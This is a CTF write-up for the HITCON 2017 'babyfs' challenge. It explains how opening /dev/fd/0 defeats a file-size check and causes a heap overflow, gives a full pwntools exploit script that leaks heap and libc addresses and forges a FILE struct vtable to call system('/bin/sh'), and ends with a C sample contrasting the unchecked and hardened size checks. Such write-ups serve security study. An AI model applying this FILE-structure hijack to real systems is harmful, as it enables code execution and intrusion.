HITCON CTF 2017 babyfs
Pwnable/CTF, 2018. 1. 30. 19:45
When I first sat down with this challenge I had no idea how to approach it, so I took the hint from a write-up that opening /dev/fd/0 lets you feed input into the program, and solved it from there.
Opening /dev/fd/0 (/dev/stdin) behaves like dup(0): the new stream reads whatever is sent on stdin.
After the open, the size-checking routine (fseek and friends) fails on /dev/fd/0 and returns -1, and that bogus size is what makes the overflow possible.
When sending with sendline, the trailing newline is still sitting in the stdin buffer and gets copied along with the data, so unless you subtract 1 or 2 from the length, more bytes than intended end up being written.
# Python 2 / pwntools exploit script (print statements and str payloads are Python 2).
from pwn import *
import struct

def fopen(name):                      # menu 1: open a file by path
    p.sendlineafter('choice: ','1')
    p.sendlineafter(':',name)

def fread(idx,size):                  # menu 2: read `size` bytes through file slot `idx`
    p.sendlineafter('choice: ','2')
    p.sendlineafter(':',str(idx))
    p.sendlineafter(':',str(size))

def fwrite(idx):                      # menu 3: write the slot's buffer out
    p.sendlineafter('choice: ','3')
    p.sendlineafter(':',str(idx))

def fclose(idx):                      # menu 4: fclose() the slot
    p.sendlineafter('choice: ','4')
    p.sendlineafter(':',str(idx))

heap = ''
libc = ''
p = process('./babyfs.bin')
fopen('/dev/fd/0') #0                 # slot 0: reads come from our stdin (acts like dup(0))
fopen('/dev/fd/1')                    # slot 1: its FILE struct sits right after slot 0's buffer
idx = 0
j = 1
# Leak a heap pointer one byte per iteration: overflow from slot 0 into the
# neighbouring FILE chunk (0x231 = its size field, 0xfbad2488 = forged _flags),
# append one extra byte, then read back what slot 1 writes out.
for i in range(0x98,0x9e):
    payload = 'A'*(24-idx)            # 24 on the first pass, 23 afterwards (the newline counts)
    payload += p64(0x231)
    payload += p64(0xfbad2488)
    fread(0,len(payload)+j)
    sleep(2)
    p.sendline(payload+struct.pack('<B',i))
    fread(1,8)
    fwrite(1)
    p.recvuntil(':')
    p.recv(1)
    heap += p.recv(1)
    fclose(1)
    fopen('/dev/fd/1')                # reopen slot 1 so the FILE struct is fresh for the next byte
    idx = 1
    j = 2
print heap.encode('hex')
heap = u64(heap+'\x00\x00') - 0xf0    # 6 leaked bytes -> heap base
print hex(heap)
# Same trick again to leak a libc pointer.
for i in range(0x78,0x7e):
    payload = 'A'*23
    payload += p64(0x231)
    payload += p64(0xfbad2488)
    fread(0,len(payload)+j)
    sleep(1)
    p.sendline(payload+struct.pack('<B',i))
    fread(1,8)
    fwrite(1)
    p.recvuntil(':')
    p.recv(1)
    libc += p.recv(1)
    print libc.encode('hex')
    fclose(1)
    fopen('/dev/fd/1')
libc_base = u64(libc+'\x00\x00') - 0x3c5540
system = libc_base + 0x45390          # offsets for the challenge's libc
print hex(libc_base)
print hex(system)
sleep(1)
# Forge slot 1's FILE struct: it starts with "/bin/sh\0", so the FILE* handed to
# the close handler doubles as the command string, and it ends with a fake vtable
# (at heap+0x1350) whose close entry is system.
payload = 'A'*23
payload += p64(0x231)
payload += '/bin/sh\x00'
payload += p64(heap+0x14a0) * 7
payload += p64(heap+0x18a0)
payload += p64(0) * 4
payload += p64(heap + 0x10)
payload += p64(4) + p64(0)*2 + p64(heap + 0x1350)
payload += p64(0xffffffffffffffff)
payload += p64(0)
payload += p64(heap + 0x1360)
payload += p64(0)*6
payload += p64(heap + 0x1350)          # vtable pointer
payload += p64(0) * 17
payload += p64(system) #__GI__IO_file_close
fread(0,len(payload)+2)
p.sendline(payload)
p.interactive()
fclose(1)                             # fclose(slot 1) -> vtable close -> system("/bin/sh")
p.interactive()
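The root cause the write-up relies on is a program that sizes its buffer from ftell() without checking that the seek succeeded, which on /dev/fd/0 yields -1. The following is an added C illustration (constructed for this page, not the challenge binary's code) of that pattern beside a hardened variant that refuses non-regular files and failed seeks; the function names and the 4096-byte bound are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

/* Pattern the writeup exploits: size a buffer from ftell() after
 * fseek(fp, 0, SEEK_END). On /dev/fd/0 (a pipe or terminal) the seek
 * fails and ftell() returns -1, which must not be used as a length. */
long file_size_unchecked(FILE *fp) {
    fseek(fp, 0, SEEK_END);          /* return value ignored: the defect */
    long size = ftell(fp);           /* -1 on a non-seekable stream */
    fseek(fp, 0, SEEK_SET);
    return size;
}

/* Hardened variant: regular files only, every return value checked,
 * and an upper bound; -1 means "refuse", never a bogus length. */
long file_size_checked(FILE *fp, long max) {
    struct stat st;
    if (fstat(fileno(fp), &st) != 0 || !S_ISREG(st.st_mode)) return -1;
    if (fseek(fp, 0, SEEK_END) != 0) return -1;
    long size = ftell(fp);
    if (size < 0 || size > max) return -1;
    return fseek(fp, 0, SEEK_SET) == 0 ? size : -1;
}

/* The bounds check a sloppy program does: (size_t)-1 is SIZE_MAX, so every
 * read request passes and the heap buffer sized from it overflows. */
int read_allowed_unchecked(long size, size_t want) { return want <= (size_t)size; }
int read_allowed_checked(long size, size_t want) { return size >= 0 && want <= (size_t)size; }

/* Demo helpers (constructed): a pipe stands in for /dev/fd/0, tmpfile() for a real file. */
long size_of_pipe(int checked) {
    int fds[2];
    if (pipe(fds) != 0) return -2;
    FILE *fp = fdopen(fds[0], "r");
    long r = checked ? file_size_checked(fp, 4096) : file_size_unchecked(fp);
    fclose(fp); close(fds[1]);
    return r;
}
long size_of_regular(const char *content, int checked) {
    FILE *fp = tmpfile();
    fputs(content, fp); fflush(fp);
    long r = checked ? file_size_checked(fp, 4096) : file_size_unchecked(fp);
    fclose(fp);
    return r;
}
```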